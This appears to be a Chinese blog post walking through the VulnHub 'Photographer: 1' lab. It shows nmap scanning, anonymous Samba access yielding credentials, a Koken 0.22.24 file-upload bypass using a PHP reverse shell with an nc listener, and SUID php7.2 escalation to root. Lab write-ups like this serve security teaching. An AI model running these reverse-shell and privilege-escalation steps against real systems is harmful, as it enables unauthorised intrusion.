• 2021年5月8日 上午5:21

超的快乐一天

做个人

PHOTOGRAPHER:1(vulnhub)

唯一一线

唯一一线

9月 6, 2020

靶机来源于:https://www.vulnhub.com/entry/photographer-1,519/

网络环境

攻击机ip:192.168.56.102(kali)

受害机ip:192.168.56.101

nmap扫描发现存活主机

nmap -sP 192.168.56.0/24

收集目标信息

nmap -sV 192.168.56.101

发现有两个http端口

分别访问

80端口:

8000端口:

这是一个koken的站点

通过koken寻找入口

查看源代码可知该koken的版本为0.22.24

搜索关于koken 0.22.24的漏洞

查询到一篇关于koken 0.22.24的上传漏洞章:

https://cxsecurity.com/issue/WLB-2020070152

该漏洞可以通过”导入内容”功能上传任意文件

但首先要先登入koken后台才可以使用

管理员页面:

http://192.168.56.101:8000/admin/

从smaba寻找有用信息

从扫描信息上看,目标机还开启smaba

直接登录发现是匿名登录

登录后有两个文件,一个txt文本和一个压缩包

文本内容:

得知Daisa的用户名为:Daisa@photographer.com

文本最后 Don’t forget your secert,my babygirl 😉

babygirl就是登录密码

上传php反弹shell

通过文章:https://cxsecurity.com/issue/WLB-2020070152所述

import content可以通过burp修改上传任意文件

使用kali自带的php反弹shell

cp /usr/share/webshells/php/php-reverse-shell.php ~/hello.php.jpg

修改hello.php.jpg文件

现在点击右下角的import content 把hello.php.jpg上传至该站

在上传过程中使用burp抓包对文件名修改

修改为hello.php上传

在content中可以通过时间找到刚上传的hello.php

现在先根据hello.php的设置监听的端口

nc -lvp 6666

然后点击就可以执行hello.php

获得shell

SUID php执行提权

python获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看suid权限的程序文件

find / -perm -u=s -type f 2>/dev/null
找到suid程序php7.2
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
获取到root权限
cat /root/proof.txt
唯一一线
Latest posts by 唯一一线 (see all)
唯一一线

唯一一线

相情不如偶遇

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注


CAPTCHA Image
Reload Image